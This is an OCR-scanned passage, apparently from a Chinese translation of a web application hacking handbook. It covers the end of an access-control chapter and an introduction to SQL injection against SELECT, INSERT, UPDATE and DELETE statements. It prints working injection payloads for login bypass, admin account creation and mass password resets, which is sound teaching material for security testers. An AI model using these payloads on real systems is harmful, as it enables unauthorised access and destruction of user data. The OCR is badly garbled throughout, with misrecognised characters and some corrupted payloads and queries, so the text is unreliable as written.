感 数据 ) 嘲 可 被 攻击 者 加 以 有 效 利用 。 

口 应 用 程序 服务 右 软 件 本 号 存在 的 汤 洞 往往 有 助 于 突破 应 用 程序 层面 执行 的 任何 访问 控 
制 ， 但 是 仍然 只 能 有 限 地 访问 数据 库 和 操作 系统 。 

口 在 适当 位 置 的 一 个 可 贷 利 用 的 访问 欣 制 漏洞 可 成 为 发 动 重大 权限 提升 攻击 的 起 点 。 例 
如 ， 如 果 能 够 修改 与 账户 有 关 的 角色 ， 那 么 再 次 使 用 账户 登录 将 能 够 提升 在 应 用 程序 
和 数据 库 层面 的 访问 权限 。 
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8.4 人 小结 


访问 控制 缺陷 可 能 以 各 种 形式 表现 出 来 。 有些 时 候 , 它们 可 能 并 没有 利用 价值 ， 允 许 访问 不 
能 进一步 提升 权限 的 “无 害 ” 功 能 。 其 他 情况 下 ,利用 在 访问 控制 中 发 现 的 一 个 漏洞 攻击 者 可 立 
即 攻破 整个 应 用 程序 。 
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造成 访问 控制 缺陷 的 来 源 各 寞 : 设计 糟糕 的 应 用 程序 很 难 或 无 法 检测 出 未 授权 访问 ,一 个 稍 
单 的 路 忽 可 能 会 使 一 两 项 功能 未 受到 保护 , 或 者 对 用 户 行为 的 错误 假设 也 可 能 会 给 应 用 程序 造成 
防御 漏洞 。 

许多 时 候 , 突破 访问 控制 非常 容易 , 只 需 请 求 一 个 凋 用 的 管理 URL 就 可 以 二 接 访 问 相关 功能 。 
但 是 ， 有 了 时 突破 访问 控制 也 可 能 非常 困难 , 一 些 细微 的 缺陷 可 能 在 应 用 程序 之 中 隐藏 得 较 深 , 特 
别 是 在 复杂 、 融 度 安全 的 应 用 程序 中 。“ 四 处 查看 ”是 攻击 访问 控制 的 最 有 效 方法 。 如 来 想 努 力 
取得 进展 , 渗透 测试 员 应 该 耐心 测试 应 用 程序 的 每 一 项 功能 , 也 许 不 久 就 可 以 发 现 一 个 能 攻破 整 
个 应 用 程序 的 缺陷 。 
































8.5 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.netwahh。 

(GD 一 个 应 用 程序 可 能 通过 使 用 HTTPReferez 消 息 头 实施 访问 控制 , 但 它 的 正常 行为 并 没有 
公开 表露 这 一 点 。 如 何 检测 出 这 种 缺陷 ? 

(2) 登录 一 个 应 用 程序 后 ， 被 重 定 回 到 以 下 URL: 

https:/wahph-app.com/MyAccount.php2uld=1241120841 

应 用 程序 似乎 加 MyAccountphp 页 面 提 区 一 个 用 户 标识 符 。 已 知 的 唯一 标识 符 是 目 己 的 标识 
符 。 如 何 测试 应 用 程序 是 否 使 用 这 个 参数 以 不 安全 的 方式 实施 访问 控制 ? 

(3) 因特网 上 的 一 个 Web 应 用 程序 通过 检查 用 户 的 来 源 耻 地 址 实施 访问 控制 。 为 什么 这 种 行为 
可 能 存在 缺陷 ? 

(4) 茶 应 用 程序 的 唯一 日 的 是 为 公众 提供 可 搜索 的 信息 仓库 。 该 应 用 程序 并 未 使 用 任何 验证 
或 会 话 管理 机 制 。 该 应 用 程序 应 执行 何 种 访问 控制 ? 

(5) 在 浏览 一 个 应 用 程序 的 过 程 中 遇 到 儿 个 应 防止 未 授权 访问 的 敏感 资源 ， 它 们 的 文件 扩展 
名 为 .xls。 这 种 情况 为 何 应 立 即 引 起 注意 ? 



































攻击 数据 存储 区 

















乎 所 有 应 用 程序 都 依赖 数据 存储 区 来 管理 在 应 用 程序 中 处 理 的 数据 。 在 许多 情况 下 ， 

这 些 数据 负责 处 理 核心 应 用 程序 逻辑 、 保 存 用 户 账 户 、 权 限 、 应 用 程序 配置 设置 等 。 
现在 ,数据 存储 区 已 不 再 只 是 被 动 的 数据 容器 。 大 多 数 数据 存储 区 都 保存 有 结构 化 、 可 以 使 用 预 
先 定义 的 查询 格式 或 语言 访问 的 数据 ， 并 包含 内 部 逻辑 来 管理 这 些 数 据 。 

通常 ,应 用 程序 使 用 常用 的 权限 级 别 来 管理 对 数据 存储 区 的 各 种 访问 操作 , 以 及 处 理 属于 不 
同 应 用 程序 用 户 的 数据 。 如 果 攻 击 者 能 够 破坏 应 用 程序 与 数据 存储 区 的 交互 , 使 应 用 程序 检索 或 
修改 各 种 数据 ， 那 么 ， 攻 击 者 就 可 以 避 开 在 应 用 层次 对 数据 访问 实施 的 任何 控制 。 

上 述 原 则 适用 于 任何 类 型 的 数据 存储 技术 。 因 为 本 书 是 一 本 实用 手册 , 我 们 将 主要 讨论 利用 
现实 世界 的 应 用 程序 中 存在 的 漏洞 时 所 需 的 知识 和 技巧 。 迄 今 为 止 最 常用 的 数据 存储 区 是 SQL 数 
据 库 、 基 于 XML 的 资料 库 、LDAP 目 录 ， 以 及 一 些 常见 的 示例 。 

在 讨论 这 些 主要 示例 时 , 我 们 将 介绍 你 在 确定 并 利用 这 些 缺 陷 时 可 以 采取 的 实用 步 又。 每 一 
种 新 型 注入 攻击 都 需要 结合 概念 加 以 理解 。 掌 握 利 用 这 些 缺 陷 的 基础 知识 后 , 如 果 再 遇 到 一 种 新 
型 注入 攻击 ,你 就 能 够 自信 地 应 用 这 些 知识 , 设计 出 其 他 攻击 方法 ,向 其 他 人 已 经 研究 过 的 漏洞 
发 动 攻击 。 


9.1 注入 解释 型 语言 
























































解释 型 语言 ( interpreted language ) 是 一 种 在 运行 时 由 一 个 运行 时 组 件 ( runtime component ) 
解释 语言 代码 并 执行 其 中 包含 的 指令 的 语言 。 与 之 相对 ， 编 译 型 语言 ( compiled language ) 是 这 
样 一 种 语言 : 它 的 代码 在 生成 时 转换 成 机 器 指令 , 然后 在 运行 时 直接 由 使 用 该 语言 的 计算 机 处 理 
希 执 行 这 些 指令 。 

从 理论 上 说 , 任何 声言 都 可 使 用 编译 硕 或 解释 带 来 执行 , 这 种 区 别 并 不 是 语言 本 里 的 内 在 特 
性 。 但是, 通常 大 多 数 语 言 仪 通过 上 述 其 中 一 种 方式 执行 ， 开 发 Web 应 用 程序 使 用 的 许多 核心 语 
言 使 用 解释 器 执行 ， 包 括 SQL、LDAP、Perl 和 PHP。 

基于 解释 型 语言 的 执行 方式 ,产生 了 一 系列 叫做 代码 注入 (code injection ) 的 漏洞 。 任 何 有 
实际 用 途 的 应 用 程序 都 会 收 到 用 户 提 交 的 数据 ,对 其 进行 处 理 并 执行 相应 的 操作 。 因 此 ， 由 解释 
硕 处 理 的 数据 实际 上 是 由 程序 员 编 写 的 代码 和 用 户 提 区 的 数据 共同 组 成 的 。 有 些 时 候 , 攻击 者 可 
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以 提交 专门 设计 的 输入 ,通常 提 交 某 个 在 应 用 程序 中 使 用 解释 型 语言 语法 的 具有 特殊 意义 的 句 
法 ， 同 应 用 程序 实施 攻击 。 结 果 ， 这 个 输入 的 一 部 分 被 解释 成 程序 指令 执行 ,好像 它 们 是 由 最 初 
的 程序 员 编 号 的 代码 一 样 。 因 此 ， 如 来 这 种 攻击 取得 成 功 ， 它 将 完全 攻破 目标 应 用 程序 的 组 件 。 

另 一 方面 ,在 编 详 型 语言 中 实施 旨 在 执行 任意 命令 的 攻击 往往 非常 困难 。 这 时 , 注入 代码 的 
方法 通常 并 不 利用 开发 日 标 程序 所 使 用 语言 的 任何 语法 特性 , 注入 的 有 效 载 何 为 机 副 人 代码， 而 不 
是 用 那 种 语言 编写 的 指令 。 请 参阅 第 16 章 了 解 各 种 针对 编译 软件 的 常见 攻击 。 


























避 开 登录 

无 论 访问 操作 是 由 普通 用 户 还 是 应 用 程序 管理 员 触 发 , 应 用 程序 访问 数据 存储 区 的 过 程 都 大 
致 相同 。Web 应 用 程序 对 数据 存储 区 实施 自主 访问 控制 , 构造 查询 基于 用 户 的 账户 和 类 型 来 检索 、 
添加 或 修改 数据 存储 区 中 的 数据 。 修 改 查 询 (不 只 是 查询 中 的 数据 ) 的 成 功 注 和 人 攻击 可 以 避 开 应 
用 程序 的 目 主 访问 控制 并 获取 未 授权 访问 。 

如 果 需 要 安全 保护 的 应 用 程序 逻辑 由 查询 结果 控制 , 攻击 者 就 可 以 通过 修改 查询 来 更 改 应 用 
程序 的 逻辑 。 举 一 个 典型 的 例子 一 一 在 后 端 数据 存储 区 的 用 户 表 中 查询 与 用 户 提 供 的 证 书 匹配 的 
记录 。 许 多 实施 基于 表单 的 登录 功能 的 应 用 程序 使 用 数据 库 来 存储 用 户 证书 ， 并 执行 简单 的 SQL 
查询 来 确认 每 次 登录 尝试 。 以 下 是 一 个 典型 的 示例 : 

SELECT * FROM users WHERE uvsername = Imarcus and password = 'secret'’ 

这 个 查询 要 求 数据 库 检 查 用 户 表 中 的 每 一 行 ， 提 取出 每 条 username 列 值 为 narcus、password 
列 值 为 secret 的 记录 。 如 果 应 用 程序 收 到 一 名 用 户 的 资料 ， 登 录 和 尝试 将 取得 成 功 ， 应 用 程序 将 
为 该 用 户 建立 一 个 通过 验证 的 会 话 。 

在 这 种 情况 下 ,攻击 者 可 注入 用 户 名 或 密码 字段 ， 以 修改 应 用 程序 执行 的 查询 ， 从 而 破坏 它 
的 逻辑 。 人 例如， 如果 攻击 者 知道 应 用 程序 管理 员 的 用 户 名 为 adtmin， 那 么 他 就 可 以 通过 提交 以 下 
用 户 名 和 任意 密码 ， 以 管理 员 身 份 登录 : 








































































































aAdmin'—-— 

应 用 程序 将 执行 以 下 查询 : 

SELECT * FROM users WHERE username = 'admin’'--' AND password = 'foo!’ 
因为 其 中 使 用 了 注释 符号 (-- )， 上 面 的 查询 等 同 于 : 

SELECT * FROM users WHERE username = :admin' 


于 是 这 个 查询 完全 人 避 开 了 密码 检查 。 


党 试 访 问 


http://mdsec.net/auth/319/ 





假如 攻击 者 不 知道 管理 员 的 用 户 名 , 该 如 何 实施 攻击 呢 ? 在 大 多 数 应 用 程序 中 , 数据 库 的 第 
一 个 账户 为 管理 用 户 , 因为 这 个 账户 通常 手工 创建 , 然后 再 通过 它 生 成 其 他 应 用 程序 账户 。 而 且 ， 
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如 果 查 询 返 回 几 名 用 户 的 资料 , 许多 应 用 程序 只 会 处 理 第 一 名 用 户 。 因 此 ,攻击 者 可 利用 这 种 行 
为 ， 通 过 提交 以 下 用 户 各， 以 数据 库 中 的 第 一 个 用 户 的 身份 登录 : 











' OR IT= 工 -一 

应 用 程序 将 执行 以 下 查询 : 

SELECT * FROM users WHERE username = '' OR 1=1--' AND password = fooc'， 
因为 其 中 使 用 了 注释 特写 ， 上 而 的 查询 等 同 于 : 

SELECT * FROM users WHERE username = '' OR 1=1 





该 查询 将 返回 全 部 应 用 程序 用 户 的 资料 。 


注解 ”注入 解释 型 语言 来 更 改 应 用 程序 逻辑 是 一 种 常用 的 攻击 技巧 。LDAP 查 询 、 
XPath 查 询 、 消 息 序 列 实施 或 任何 定制 的 查询 语言 中 都 可 能 出 现 对 应 的 漏洞 。 


渗透 测试 步骤 

解释 型 语言 注入 是 一 个 非 稼 宽泛 的 主题 ， 涵 善 许多 不 同 种 类 的 漏洞 ， 并 可 能 影响 Web 应 用 
程序 文 持 基础 架构 中 的 每 一 个 组 件 。 检 测 并 利用 代码 注入 缺陷 的 详细 步骤 取决 于 攻击 所 针对 的 
是 何 种 语言 , 以 及 应 用 程序 开发 者 使 用 了 什么 编程 技巧 。 但 也 有 一 些 适 用 于 各 种 情形 的 常规 方 
下 

(1) 提交 可 能 在 解释 型 语言 中 引发 问题 的 无 效 语法 。 

(2) 确定 应 用 程序 啊 应 中 可 能 表示 存在 代码 注 入 漏洞 的 任何 反 并 现象 。 

(3) 如 采 收 到 任何 错误 消息 ， 分 析 这 些 消息 ， 获 得 与 服务 硕 上 发 生 的 问题 有 关 的 证 气 。 

(4) 如 有 必要 ， 系 统 性 地 修改 初始 输入 ， 尝 试 确定 或 否定 最 初 假设 的 漏洞 诊断 。 

(5) 构造 一 个 概念 验证 测试 ( proof-of-concept test )， 使 安全 命令 以 可 证 实 的 方式 执行 ， 得 
出 结论 以 证 明 应 用 程序 中 存在 一 个 可 被 利用 的 代码 注入 漏洞 。 

(6) 利用 目标 语言 和 组 件 的 功能 实现 攻击 目标 ， 对 漏洞 加 以 利用 。 






































9.2 注入 SQL 


几乎 每 一 个 Web 应 用 程序 都 使 用 数据 库 来 保存 操作 所 需 的 各 种 信息 。 例 如 ， 网 上 和 雪 售 商 所 用 
的 Web 应 用 程序 使 用 数据 库 保存 以 下 信息 : 

口 用 户 账户 、 证 书 和 个 人 信息 ; 

口 所 销售 商品 的 介绍 与 价格 ; 

口 订单 、 账 单 和 支付 细 市 ; 

口 每 名 应 用 程序 用 户 的 权限 。 
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数据 库 中 的 信息 通过 SQL (Structured Query Language， 结 构 化 查询 语言 ) 访问 。SQL 可 用 于 
读 取 、 更 新 、 增 加 或 删除 数据 库 中 保存 的 信息 。 

SQL 是 一 种 解释 型 语言 ，Web 应 用 程序 经 党 建立 合并 用 户 提 交 的 数据 的 SQL 语 句 。 因 此 ， 如 
果 建 立 语 句 的 方法 不 安全 ， 那 么 应 用 程序 可 能 易于 受到 SQL 注 入 攻击 。 这 种 缺陷 是 困扰 Web 应 用 
程序 的 最 吴 名 昭著 的 漏洞 之 一 。 在 最 严重 的 情形 中 ,匿名 攻击 者 可 利用 SQL 注 入 读 取 并 修改 数据 
库 中 保存 的 所 有 数据 ， 甚 至 完全 控制 运行 数据 库 的 服务 需 。 

随 着 Web 应 用 程序 安全 意识 的 日 渐 增 强 ，SQL 广 入 漏洞 越 来 越 少 ， 同 时 也 变 得 更 加 难以 检测 
与 利用 。 许 多 主流 应 用 程序 采用 API 来 避免 $QL 注 入 ， 如 果 使 用 得 当 , 这 些 API 能 够 有 效 阻 止 SQL 
注入 攻击 。 在 这 些 情况 下 ,通常 只 有 在 无 法 应 用 这 些 防御 机 制 时 ，SQL 注 入 才 会 发 生 。 有 了 时， 查 
找 SQL 注 入 漏洞 是 一 项 艰难 的 任务 , 需要 测试 员 坚 持 不 懈 地 在 应 用 程序 中 探查 一 两 个 无 法 应 用 常 
规 控 制 的 实例 。 

随 着 这 种 趋 热 的 变化 ， 查 找 并 利用 SQL 注 入 漏洞 的 方法 也 在 不 断 改 进 , 通常 使 用 更 加 微妙 的 
漏洞 指标 以 及 更 加 完善 与 强大 的 利用 技巧 。 我 们 首先 分 析 最 基本 的 情况 ,然后 进一步 描述 最 新 的 
育 目 检测 与 利用 技巧 。 

有 大 量 广泛 的 数据 库 可 为 Web 应 用 程序 提供 文 持 。 虽 然 对 绝 大 多 数 数据 库 而 言 ，SQL 注 入 的 
基本 原理 大 体 相 似 , 但 它们 之 间 也 存在 着 许多 差异 , 包括 语法 上 的 细微 变化 以 及 可 能 影响 攻击 者 
所 使 用 的 攻击 类 型 的 巨大 行为 与 功能 差异 。 受 篇 幅 和 个 人 经 验 所 限 , 在 下 面 的 示例 中 ,我 们 仅 讨 
论 3 种 最 常用 的 数据 库 ， 即 Oracle。、MS-SQL 和 MySQL。 在 适当 的 情况 下 ， 我 们 将 主要 讨论 这 3 种 
平台 之 则 的 区 别 。 和 掌握 这 些 技术 后 ， 就 可 以 通过 其 他 一 些 研 究 ， 迅速 确定 并 利用 任何 其 他 数据 库 
中 的 SQL 注 入 漏洞 。 







































































提示 许多 时 候 , 访问 和 目标 应 用 程序 所 使 用 数据 库 相 同 的 、 在 本 地 安装 的 数据 库 会 
vd 有 极 大 帮助 。 通 常 ， 只 需 修 改 一 个 语法 或 者 参考 一 个 内 置 表 或 功能 就 可 实现 自己 的 目 
的 。 从 目标 应 用 程序 收 到 的 响应 一 般 并 不 完整 或 者 含义 模糊 ， 需 要 猜测 才能 理解 。 如 


果 能 交叉 参考 相同 数据 库 的 一 个 完全 “透明 ”运行 的 版 本 ， 理 解 起 来 就 容易 得 多 。 
如 果 这 种 方法 不 可 行 ， 最 好 找 一 个 可 以 进行 测试 的 适当 交互 式 在 线 环 境 ， 如 
SQLzoo.net 中 的 交互 式 在 线 教程 。 





9.2.1 利用 一 个 基本 的 漏洞 


下 面 以 一 个 书籍 零售 商 使 用 的 Web 应 用 程序 为 例 ， 该 应 用 程序 允许 用 户 根 据 作者 、 书 名 、 出 
版 商 等 信息 搜索 产品 。 完 整 的 书籍 目录 保存 在 数据 库 中 , 应 用 程序 使 用 SQL 查询 、 根 据 用 户 提交 
的 搜索 项 获取 各 种 书籍 的 信息 。 

当 一 名 用 户 搜 索 由 Wiley 出 版 的 所 有 书籍 时 ， 应 用 程序 执行 以 下 查询: 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' and 
pPublished=1 
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该 查询 要 求 数 据 库 检 查 书 籍 表 的 第 一 行 , 提取 每 条 publisher 列 为 wiley 值 的 记录 , 并 返回 
所 有 这 些 记录 。 然 后 应 用 程序 处 理 这 组 记录 ， 并 通过 一 个 HTML 页 面 将 结果 显示 给 用 户 。 

在 这 个 查询 中 ， 等 号 左边 的 词 由 SQL 关键 字 、 表 和 数据 库 列 名 称 构成 。 这 个 部 分 的 全 部 内 容 
由 程序 员 在 创建 应 用 程序 时 建立 。 当 然 ， 表 达 式 wiley 由 用 户 提交 ， 它 是 一 个 数据 项 。SQL 查 询 
中 的 字符 串 数据 必须 包含 在 单 引号 内 ， 与 查询 的 其 他 内 容 分 隔 开 来 。 

现在 思考 一 下 ， 如 果 用 户 搜索 所 有 由 O’Reilly 出 版 的 书籍 ， 会 出 现 什么 情况 。 应 用 程序 将 执 
行 以 下 查询 : 

SELECT author,title,year FROM books WHERE publisher = 'O'Reilly' and 

published=1 


在 这 个 示例 中 , 查询 解 释 角 以 和 前 面 一 个 示例 相同 的 方式 到 达 字 符 串 数据 位 置 。 它 解析 这 个 
包含 在 单 引 号 中 的 数据 ， 得 到 值 0。 然 后 遇 到 表达 了 式 Reilly' ， 这 并 不 是 有 效 的 SQL 语 法 ， 因 此 
应 用 程序 生成 一 条 错误 消息 : 

Incorrect syntax near 'Reilly'. 


Server: MSG 105, Level 15, State 1, Line 1 
Unclosed gquotation mark before the character string ' 


如 果 应 用 程序 以 这 种 方式 运行 ,那么 它 非 稼 容易 遭 到 SQL 注入 。 攻 击 者 可 提交 包含 引号 的 
输入 终止 他 控制 的 字符 串 ， 然 后 编写 任意 的 SQL 修 改 开发 者 想 要 应 用 程序 执行 的 查询 。 例 如 ， 
在 这 个 示例 中 ,攻击 者 可 以 对 碍 询 进 行 修 改 ， 通 过 输入 以 下 搜索 项 ， 返 回 零售 商 目 录 中 的 每 一 
本 书籍 。 

Wiley' OR 1=1-- 

应 用 程序 将 执行 以 下 查询 : 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 
1=1--' and published=1 


这 个 查询 对 开发 者 查询 中 的 WHERE 子 句 进 行 修改 ,增加 了 另外 一 个 条 件 。 数 据 库 将 检查 书籍 
表 的 每 一 行 ， 提取 publisher 列 值 为 Niley 或 其 中 1 等 于 1 的 每 条 记录 。 因 为 1 总 是 等 于 1 ， 所 以 数 
据 库 将 返回 书籍 表 中 的 所 有 记录 。 

攻击 者 的 输入 中 的 双 连 字符 在 SQL 中 是 一 个 有 意义 的 表达 式 , 它 告 诉 查 询 解释 带 该 行 的 其 他 
部 分 属于 注释 ,应 被 忽略 。 在 一 些 SQL 注 入 攻击 中 ， 这 种 技巧 极其 重要 ， 因 为 它 人 允许 忽略 由 应 用 
程序 开发 者 建立 的 查询 的 剩余 部 分 。 在 上 面 的 示例 中 ,应 用 程序 将 用 户 提 交 的 字符 串 包含 在 单 引 
号 中 。 因 为 攻击 者 已 经 终止 他 控制 的 字符 串 并 注 和 人 其 他 一 些 SQL, 他 需要 人 处理 字符 串 示 尾部 分 的 
引号 , 避免 出 现 和 O” Reilly 示 例 中 相同 的 语法 错误 ,攻击 者 通过 添加 一 个 双 连 字符 达到 这 一 日 的 ， 
将 查询 的 剩余 部 分 以 注释 处 理 。 在 MySQL 中 ， 需 要 在 双 连 字符 后 加 入 一 个 空格 ,或 者 使 用 “#” 
和 从 号 指定 注释 。 

原始 查询 还 将 访问 仪 限 于 已 出 版 的 书籍 ， 因 为 它 指 定 and published=1。 通 过 注入 注释 序 
列 ， 攻 击 者 获得 未 授权 访问 权限 ， 可 以 返回 所 有 书籍 ( 包括 已 出 版 及 其 他 书籍 ) 的 详细 信息 。 
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提示 “有 些 时 候 ， 可 以 不 使 用 注释 符号 处 理 字符 串 末 尾部 分 的 引号 ， 而 用 一 个 需要 引 
J 号 包含 的 字符 事 数 据 结束 注入 的 输入 ,以 此 “平衡 引号 ”。 例 如， 输入 以 下 搜索 项 : 


wiley' or 'a' 


将 生成 以 下 查询 . 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' OR 
'a'='ada' and published=1 


这 个 查询 完全 有 效 ， 可 得 到 和 1=1 攻 击 相同 的 结果 。 








很 明显 , 前面 的 示例 不 会 造成 严重 的 安全 威胁 , 因为 用 户 使 用 完全 合法 的 方法 就 可 以 访问 全 
部 书籍 信息 。 但 是 , 稍 后 我 们 将 描述 如 何 利用 这 种 SQL 注 侦 洞 从 各 种 数据 库 表 中 提取 任何 数据 ， 
并 提升 在 数据 库 和 数据 库 服 务 带 中 的 权限 。 为 此 ,不 管 出 现在 哪个 应 用 程序 功能 中 , 任何 SQL 注 
入 漏洞 都 应 被 视 为 极其 严重 的 威胁 。 





9.2.2 ”注入 不 同 的 语句 类 型 


SQL 语言 中 包含 许多 可 能 出 现在 语句 开头 的 动词 。 由 于 SELECT 是 最 常用 的 动词 ， 因 此 绝 大 
多 数 的 SQL 注入 漏洞 出 现在 这 种 语句 中 。 的 确 ， 当 讨论 SQL 注入 时 ， 因 为 所 举 的 示例 全 部 属于 这 
种 类 型 ， 所 以 我 们 常常 会 产生 这 样 的 印象 ， 即 SQL 注 入 漏洞 只 出 现在 SELECT 语 句 中 。 然 而 ， 任 
何 类 型 的 语句 都 可 能 存在 SQL 缺陷 ， 必 须 了 解 一 些 与 其 有 关 的 重要 问题 。 

当然 ， 当 与 一 个 远程 应 用 程序 交互 时 , 通常 情况 下 不 可 能 提前 知道 用 户 输入 的 一 个 特殊 数据 
项 将 由 哪 种 类 型 的 语句 处 理 。 但 是 , 可 以 根据 使 用 的 应 用 程序 功能 进行 合理 的 猜测 。 下 面 说 明 最 
常用 的 SQL 语 句 及 其 用 法 。 

1. SELECT 语句 

SELECT 语 人 句 补 用 于 从 数据 库 中 获取 信息 。 它 们 常用 于 应 用 程序 啊 应 用 户 操 作 而 返回 信息 的 
功能 中 ， 如 浏览 一 个 产品 目录 、 查 看 一 名 用 户 的 资料 或 者 进行 一 项 搜索 。 根 据 数 据 库 中 的 数据 核 
对 用 户 提交 的 信息 的 登录 功能 也 经 常 使 用 这 种 语句 。 

如 在 前 面 的 示例 中 说 明 的 , SQL 注入 攻击 的 进入 点 (entry point ) 通 常 是 查询 中 的 WHERE 子 句 ， 
它 将 用 户 提 交 的 数据 传送 给 数据 库 ， 以 控制 查询 结果 的 范围 。 因 为 wHERE 子 名 一般 在 SEEcT 语 
句 的 最 后 , 攻击 者 就 可 以 使 用 注释 符号 将 查询 截 短 到 其 输入 的 结束 位 置 ， 而 不 会 使 整个 查询 的 语 
人 

SQL 注入 漏洞 偶尔 也 会 影响 SELECT 查询 的 其 他 部 分 ， 如 ORDER BY 子 句 或 表 和 列 名 称 。 


















































尝试 访问 


http://mdsec.net/addressbook/32/ 


2. INSER 语 各 


INSERT 语 句 用 于 在 表 中 建立 一 个 新 的 数据 行 。 应 用 程序 通常 使 用 这 种 语句 添加 一 条 新 的 审 
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计 日 志 、 创 建 一 个 新 用 户 账户 或 生成 一 个 新 订单 。 
例如 ， 如果 一 个 应 用 程序 允许 用 户 自 我 注册 ,指定 他 们 自己 的 用 户 名 和 和 密码, 就 可 以 使 用 下 
面 的 语句 将 用 户 资 料 插 入 users 表 中 ，。 


INSERT INTO users {username, password, ID, Prives) VALUES ('daf':, 
'Ssecret’', 2248, 1) 


如 果 username 或 passwordq 字 段 存 在 SQL 注入 漏洞 ， 那 么 攻击 者 就 可 以 在 表 中 搬入 任何 数 
据 ， 包 括 他 目 己 的 ID 和 privs 值 。 然 而 ， 要 想 这 样 做 ,攻击 者 束 必 须 确保 VALUES 子 句 的 其 他 部 
分 正常 运行 。 特 别 是 其 中 数据 项 的 个 数 与 类 型 必须 正确 。 例 如 ， 当 注入 username 字 上 段 时 ， 攻 击 
者 可 以 提交 以 下 输入 : 

foo', 'bar', 9999, 0)-- 
它 将 建立 一 个 ID 为 9999，privs 为 0 的 账户 。 假 如 privs 字 段 用 来 决定 账户 权限 ， 那 么 攻击 者 就 
可 以 利用 它 创 建 一 个 管理 用 户 。 

有 时 ， 攻 击 者 完全 育 目地 注入 一 个 INSERT 语 句 也 能 够 从 应 用 程序 中 提取 出 字符 串 数 据 。 例 
如 , 攻击 者 可 以 拦 惟 数 据 库 的 版 本 字符 串 , 并 把 它 插入 目 己 用 户 资 料 的 一 个 字段 中 ; 正常 情况 下 ， 
浏览 硕 将 显示 效 据 库 的 版 本 信息 。 






































提示 当 设法 注入 一 个 INSERT 语 名 时， 可 能 无 法 提前 知道 需要 提交 多 少 个 参数 或 参数 
的 类 型 。 在 前 面 的 示例 中 ,可 以 通过 在 VALUES 子 句 中 持续 增加 一 个 新 的 字段 ， 直 到 应 
用 程序 创建 了 确实 想 要 的 用 户 账户 ,从 而 解决 上 述 问题 , 例如 ， 当 注入 username 字 段 
时 ， 可 以 提交 以 下 输入 : 
FOO')—-— 
) 


EOO ' ， 1 )—- 
Foo', 1, 1, 1)-- 


由 于 大 多 数 数 据 库 都 会 隐 式 地 将 一 个 整数 转换 为 一 个 字符 事 ， 可 以 在 每 个 位 置 都 
使 用 一 个 整数 。 在 这 个 示例 中 ， 不管 其 他 字段 如 何 ， 它 将 生成 一 个 用 户 名 为 Eoo、 帘 
码 为 1 的 账户 。 

如 果 发 现 使 用 值 1 仍 然 但 到 拒绝 ,可 以 尝试 使 用 值 2000, 许多 数据 库 也 会 隐 式 地 将 
它 转 换 成 基于 数据 的 数据 类 型 。 

确定 注入 点 之 后 的 正确 字段 数 后 , 在 MS-SQL 中 , 测试 员 可 以 任意 添加 另外 一 个 查 
询 ， 并 采用 本 章 后 面部 分 将 介绍 的 基于 推断 的 技巧 。 

在 Oracle 中 , 则 可 以 在 insert 查 询 内 发 布 subselect 查 询 , 使 用 本 章 后 面 
基于 推断 的 技巧 ， 该 subselect 查 询 可 能 导致 主 查询 成 功 或 失败 。 


尝试 访问 


http://mdsec.net/addressbook/12/ 


FooO', 


1 
1 
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3. UPDATE 语 句 

UPDATE 语 句 用 于 修改 表 中 的 一 行 或 几 行 数据 。 它 们 经 常用 在 用 户 修 改 已 有 数据 值 的 功能 中 ， 
例如 ， 更 新 联系 信息 、 修 改 密码 或 更 改 订单 数量 。 

典型 UPDATE 语 名 的 运行 机 制 与 INSERT 语 句 类 似 ， 只 是 UPDATE 语 句 中 通常 包含 一 个 WHERE 
子 句 ， 告 诉 数 据 库 更 新 表 中 哪些 行 的 数据 。 例 如 ， 当 用 户 修改 密码 时 ， 应 用 程序 可 能 会 执行 以 
下 查询 : 


UPDATE users SET password='newsecret’' WHERE user = 'marcus' and password 
= Secret' 


实际 上 ， 这 个 查询 冯 先 核实 用 户 的 现 有 密码 是 否 正 确 ， 如 果 密 码 无 误 ， 就 用 新 的 值 更 新 它 。 
如 有 果 这 项 功能 存在 SQL 注 入 漏洞 ,那么 攻击 者 丈 能 避 开 现 有 密码 检查 ,通过 输入 以 下 用 户 名 更 新 
管理 员 的 密码 : 


adQdmin'—-— 























注解 ”由 于 无 法 提前 知道 应 用 程序 将 根据 专门 设计 的 输入 执行 什么 操作 ， 因 此 ， 在 一 
个 远程 应 用 程序 中 探查 SQL 注 入 汤 洞 往往 非常 危险 。 特别 注意 ,修改 UPDATE 语 名 中 的 
WHERE 子 名 可 能 会 使 一 个 重要 的 数据 库 表 发 生 彻 底 的 改变 。 例 如 ， 如 果 上 面 的 攻击 者 
之 前 已 经 提交 了 以 下 用 户 名 : 

admin' or 1=1-- 
那么 应 用 程序 可 能 会 执行 以 下 查询 : 


UPDATE users SET password='newsecret' WHERE user = 'admin' or 1=1 


它 会 重新 设置 每 一 名 用 户 的 窗 码 ! 

即使 所 攻击 的 应 用 程序 功能 (如 主 登 录 功 能 ) 并 不 会 更 新 任何 现 有 数据 ,渗透 测 
试 员 也 应 当 留 意 这 种 风险 。 有 时 候 ， 在 用 户 成 功 登 录 后 ， 应 用 程序 会 使 用 用 户 提交 的 
用 户 名 执行 各 种 UPDATE 查 询 ， 这 意味 着 任何 针对 WHERE 子 名 的 攻击 可 能 会 “复制 ”到 
其 他 语句 中 ， 给 所 有 应 用 程序 用 户 的 资料 造成 严重 破坏 。 在 尝试 探查 或 利用 任何 SQL 
注入 漏洞 之 前 ， 必 须 确保 应 用 程序 所 有 者 接受 这 些 无 法 避免 的 风险 ; 同时 ， 应 该 强烈 
建议 他 们 在 开始 测试 前 对 数据 库 进 行 完 整备 份 。 





尝试 访问 


http://mdsec.net/addressbook/27/ 


4. DELETE 语 名 
DELETE 语 句 用 于 删除 表 中 的 一 行 或 几 行 数据 ， 例 如 用 户 从 他 们 的 购物 篮 中 删除 一 件 商 品 或 
从 个 人 资料 中 删除 一 个 交 贷 地 址 。 
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与 UPDATE 语 人 句 一 样 ，DELETE 语 句 通 稼 使 用 wHERE 子 句 告 诉 数据 库 更 新 表 中 哪些 行 的 数据 ， 
并 很 可 能 在 这 个 子 句 中 并 和 人 用户 提交 的 数据 。 破 坏 正 常 运行 的 WHERE 子 句 可 能 会 造成 严重 的 后 
果 ， 我 们 在 UPDATE 语句 部 分 提出 的 警告 同样 适用 于 这 种 攻击 。 











9.2.3 三 明 SQL 注 入 漏洞 

